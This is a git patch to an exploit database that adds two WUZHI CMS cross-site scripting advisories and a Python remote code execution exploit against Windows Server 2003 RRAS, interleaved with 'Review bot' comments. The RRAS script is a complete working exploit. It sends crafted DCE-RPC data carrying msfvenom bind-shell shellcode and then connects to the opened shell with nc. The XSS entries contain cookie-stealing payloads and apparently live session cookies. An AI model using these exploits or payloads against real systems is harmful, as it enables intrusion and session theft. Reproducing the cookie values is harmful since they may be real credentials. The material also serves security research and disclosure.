From 0ca4688023825c68670eea1ead77a2ed84180a72 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 14 May 2018 05:01:48 +0000
Subject: [PATCH] DB: 2018-05-14
3 changes to exploits/shellcodes
Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution
WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting
WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting
---
 exploits/php/webapps/44617.txt | 16 ++++++
 exploits/php/webapps/44618.txt | 28 ++++++++++
 exploits/windows/remote/44616.py | 87 ++++++++++++++++++++++++++++++++
 files_exploits.csv | 3 ++
 4 files changed, 134 insertions(+)
 create mode 100644 exploits/php/webapps/44617.txt
 create mode 100644 exploits/php/webapps/44618.txt
 create mode 100755 exploits/windows/remote/44616.py
diff --git a/exploits/php/webapps/44617.txt b/exploits/php/webapps/44617.txt
new file mode 100644
index 000000000..ae944a982
--- /dev/null
+++ b/exploits/php/webapps/44617.txt
@@ -0,0 +1,16 @@ +# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability +# Date: 2018-4-23 +# Exploit Author: jiguang (s1@jiguang.in) +# Vendor Homepage: https://github.com/wuzhicms/wuzhicms +# Software Link: https://github.com/wuzhicms/wuzhicms +# Version: 4.1.0 +# CVE: CVE-2018-10313 + +An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/133) +There is a xss vulnerability that can stealing administrator cookie, fishing attack, etc. via the form%5Bqq_10%5D parameter post to the /index.php?m=member&f=index&v=profile&set_iframe=1 + +`POST /wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://localhost/wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 Content-Type: application/x-www-form-urlencoded Content-Length: 74 Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3; EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D; EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj; EkT_userkeys=e7%2FCIDS8IFYxTUG8kAb7Ww%3D%3D; EkT_truename=yuduo; EkT_auth=lwMUjMOtAXpsQyZViV3zkNdoXMK7Up5NWRRI4Ro4FDKECQHhZ1ntK0WcBotqHVYyx3z9AYABYpAsEx4OdqcExF5S1d7Gw31AvtN07WdqMw28yLCoyNv8RA%3D%3D; EkT__uid=ocqUyYLd7bm05%2Ft4KcS%2B6Q%3D%3D; EkT__username=URDJ1YisL%2BXkt7Mzgg3aNA%3D%3D; EkT__groupid=aZR0cJTYiMBkLfoq8PwJ0g%3D%3D; EkT_modelid=10; tFf_uid=ej6BNn7ulZVYfrHwlgXMvg%3D%3D; tFf_username=YuhCykTKqrPt5fHl2zROVg%3D%3D; tFf_wz_name=IAFonn80xi%2FUvXNXx8uR%2FQ%3D%3D; tFf_siteid=dUi1cO%2FrqMr0atgyt9b%2BNw%3D%3D; tFf_auth=EVUCupGrAYuOzHKFNYqbS%2B39rd2Ynyn74kyNU3KlUwiQCJGQMAgEMU0go7SqkJsUA8kNZq6BsF5nFNbEeL5ehNOQ5DkCGZ4h4JnRqFB8UFIh9kWHsJe84Q%3D%3D; tFf__uid=FM0wd0X5ONWZsKHK8N3j%2Fw%3D%3D; tFf__username=haycqodNzDQbfpqnsWY3xA%3D%3D; 
tFf__groupid=I7EFExZnf2tvQCMhDV%2B1nA%3D%3D; tFf_truename=yuduo; tFf_modelid=10; SwW_uid=Bk1YojgAB4vSAv%2BmPy3WYg%3D%3D; SwW_username=BTEh6yj6GaEMdyByi0JOZw%3D%3D; SwW_wz_name=8vypKiZ6Ck1JQloRN3gGZQ%3D%3D; SwW_siteid=jm2uH%2FJAmU8uh1X4AlQ1nQ%3D%3D; SwW_qkey=sSAglhFB%2F04GAI1A3H4vDpnfBjktIjQO; SwW_truename=yuyuyu; SwW_auth=qVG8d0BqbIYaHf7emEsG%2Bz%2Fo4LTxYomIRzLjUyu1wWd0BfW4Eucw1UXVm3OTEBexHDGzzwvYarSW62r%2F%2BZrP6RZloFSgyn1%2B5QSsfVv8XDbbIN5Wzd32rQ%3D%3D; SwW__uid=SQgSrskOQqPeThE7vxpQuQ%3D%3D; SwW__username=ZnY2K%2B8IB6WgdsrHTD%2F%2Fzg%3D%3D; SwW__groupid=wVnor3QYe03CC%2B9JInwPIQ%3D%3D; SwW_modelid=10 Connection: close Upgrade-Insecure-Requests: 1 + +`form%5Bqq_10%5D`=234234" onmouseover="confirm(22)&submit=%E6%8F%90%E4%BA%A4` + +------------------ \ No newline at end of file diff --git a/exploits/php/webapps/44618.txt b/exploits/php/webapps/44618.txt new file mode 100644 index 000000000..7666eed5c --- /dev/null +++ b/exploits/php/webapps/44618.txt 
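Review bot: The captured request on the `POST /wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1` line carries a full set of session and authentication cookies (`PHPSESSID`, `EkT_auth`, `tFf_auth`, `SwW_auth`, and the related `_uid`/`_username` values) that play no part in demonstrating the issue and look like the researcher's live session material; they should be reduced to placeholders before publication. The advisory also never states which privilege is needed to reach the profile form or where the `form[qq_10]` value is later rendered, which is what a reader needs to judge whether the "stealing administrator cookie" claim describes reflected or stored XSS — the member cookies in the request suggest a logged-in member account is required, but that is inferred, not stated. A single line such as `Requires: [role]; payload rendered unencoded in: [page/template]` after the CVE header would settle both questions.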
@@ -0,0 +1,28 @@ +# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability +# Date: 2018-4-23 +# Exploit Author: jiguang (s1@jiguang.in) +# Vendor Homepage: https://github.com/wuzhicms/wuzhicms +# Software Link: https://github.com/wuzhicms/wuzhicms +# Version: 4.1.0 +# CVE: CVE-2018-10311 + +An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/131) +There is a xss vulnerability that can stealing administrator cookie, fishing attack, etc. via the tag[pinyin] parameter post to the /index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=?&_submenuid=? + + +`[POST /www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101 HTTP/1.1 + Host: localhost + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + Accept-Encoding: gzip, deflate + Referer: http://localhost/www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101 + Content-Type: application/x-www-form-urlencoded + Content-Length: 270 + Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3; EkT_uid=c%2FzWH2EByNj%2Fm78WencnAg%3D%3D; EkT_username=oR5iColhZ3j6z343ib%2B9Lg%3D%3D; EkT_wz_name=LVeemy520l5DQnc4SQGtsw%3D%3D; EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D; EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj + Connection: close + Upgrade-Insecure-Requests: 1 + +tag%5Btag%5D=jiguang&tag%5Btitle%5D=jiguang&tag%5Bkeyword%5D=jiguang&tag%5Bdesc%5D=jiguang&tag%5Bisshow%5D=1&tag%5Blinkageid%5D=0&LK2_1=0&## tag%5Bpinyin%5D=ji%3Cimg%2Fsrc%3D1+onerror%3Dalert%28document.cookie%29%3E&tag%5Bletter%5D=&tag%5Burl%5D=&submit=%E6%8F%90+%E4%BA%A4](url)` + +------------------ \ No newline at end of file diff --git a/exploits/windows/remote/44616.py b/exploits/windows/remote/44616.py new file mode 100755 index 000000000..e84628d5e --- /dev/null +++ b/exploits/windows/remote/44616.py 
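Review bot: The request transcript in this file has been damaged by markdown rendering and no longer matches what the CMS would actually receive: the `POST` line is wrapped as `[POST ...](url)`, the `Accept:` header reads `,/;q=0.8` where the `*/*` token was consumed as emphasis, and the body contains a stray `&## tag%5Bpinyin%5D` heading marker. Anyone comparing this against server logs or the stated `Content-Length: 270` will get a mismatch, so the raw request should be restored as plain text with no link or heading markup. The `Cookie:` line likewise carries a live `PHPSESSID` and `EkT_*` auth values that are irrelevant to the finding and should be redacted. The description's `_menuid=?&_submenuid=?` also disagrees with the `95`/`101` values in the request; either say the ids are installation-specific or use the captured values in both places.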
@@ -0,0 +1,87 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +#Tested in Windows Server 2003 SP2 (ES) - Only works when RRAS service is enabled. + +#The exploited vulnerability is an arbitraty pointer deference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure. +#dwVarID (sent by the client) is used as a pointer to an array of functions. The application doest not check if the pointer is #pointing out of the bounds of the array so is possible to jump to specific portions of memory achieving remote code execution. +#Microsoft has not released a patch for Windows Server 2003 so consider to disable the RRAS service if you are still using +#Windows Server 2003. + +#Exploit created by: Víctor Portal +#For learning purpose only + +import struct +import sys +import time +import os + +from threading import Thread + +from impacket import smb +from impacket import uuid +from impacket import dcerpc +from impacket.dcerpc.v5 import transport + +target = sys.argv[1] + +print '[-]Initiating connection' +trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target) +trans.connect() + +print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target +dce = trans.DCERPC_class(trans) + +#RRAS DCE-RPC endpoint +dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0'))) + +#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python +buf = "" +buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33" +buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc" +buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8" +buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f" +buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35" +buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43" +buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f" +buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01" +buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6" +buf 
+= "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff" +buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2" +buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9" +buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7" +buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51" +buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04" +buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9" +buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23" +buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98" +buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97" +buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5" +buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5" +buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd" +buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b" +buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b" +buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9" +buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90" +buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8" +buf += "\xc4\x25\x3d\xe9" + +#NDR format +stub = "\x21\x00\x00\x00" #dwPid = PID_IP (IPv4) +stub += "\x10\x27\x00\x00" #dwRoutingPID +stub += "\xa4\x86\x01\x00" #dwMibInEntrySize +stub += "\x41"*4 #_MIB_OPAQUE_QUERY pointer +stub += "\x04\x00\x00\x00" #dwVarID (_MIB_OPAQUE_QUERY) +stub += "\x41"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY) +stub += "\xa4\x86\x01\x00" #dwMibOutEntrySize +stub += "\xad\x0b\x2d\x06" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY) +stub += "\xd0\xba\x61\x41\x41" + "\x90"*5 + buf + "\x41"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY) +stub += "\x04\x00\x00\x00" #dwId (_MIB_OPAQUE_INFO) +stub += "\x41"*4 #ullAlign (_MIB_OPAQUE_INFO) + + +dce.call(0x1e, stub) #0x1d MIBEntryGetFirst (other RPC calls are also affected) +print "[-]Exploit sent to target successfully..." 
+
+print "Waiting for shell..."
+time.sleep(5)
+os.system("nc " + target + " 4444")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 360488e33..fba37c42f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -16485,6 +16485,7 @@ id,file,description,date,author,type,platform,port
 44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
 44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
 44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
+44616,exploits/windows/remote/44616.py,"Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution",2018-05-13,vportal,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39302,3 +39303,5 @@ id,file,description,date,author,type,platform,port
 44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java,
 44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php,
 44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community - 2.2.0 – Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows,
+44617,exploits/php/webapps/44617.txt,"WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
+44618,exploits/php/webapps/44618.txt,"WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
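Review bot: `target` is taken from `sys.argv[1]` with no argument-count check and is later spliced into a shell string in `os.system("nc " + target + " 4444")`, so a missing argument dies with an IndexError before anything is printed and any shell metacharacters in the argument are interpreted by the shell. Add `if len(sys.argv) != 2: sys.exit("usage: %s <target>" % sys.argv[0])` before the first use, and run the client without a shell via `subprocess.call(["nc", target, "4444"])` (with `import subprocess` added to the import block at the top of the hunk). The comment on `dce.call(0x1e, stub)` names opnum `0x1d` while the call passes `0x1e`; the comment should match the value actually sent or explain why they differ. `struct`, `Thread`, `smb` and `dcerpc` are imported but never used in the hunk, and the header comment's "arbitraty pointer deference" / "doest not" should read "arbitrary pointer dereference" / "does not". `trans.connect()` and `dce.call()` results are never checked, so a refused pipe or bind failure surfaces only as a traceback rather than a message.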